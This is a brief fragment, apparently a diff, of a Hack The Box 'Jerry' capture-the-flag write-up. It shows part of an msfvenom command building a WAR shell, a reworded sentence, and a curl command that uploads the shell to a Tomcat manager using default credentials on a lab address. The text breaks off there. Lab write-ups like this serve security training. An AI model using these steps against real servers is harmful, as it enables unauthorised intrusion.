Hack The Box Jerry Writeup

 -f war > machines/jerry/msfvenom_shell.war

-Then, we use CURL to upload the msfvenom_shell.war shell created above:
+Then, we use CURL to upload the msfvenom_shell.war shell created by msfvenom.

 curl -u "tomcat:s3cret" "http://10.10.10.95:8080/manager/text/deploy?path=/shell" \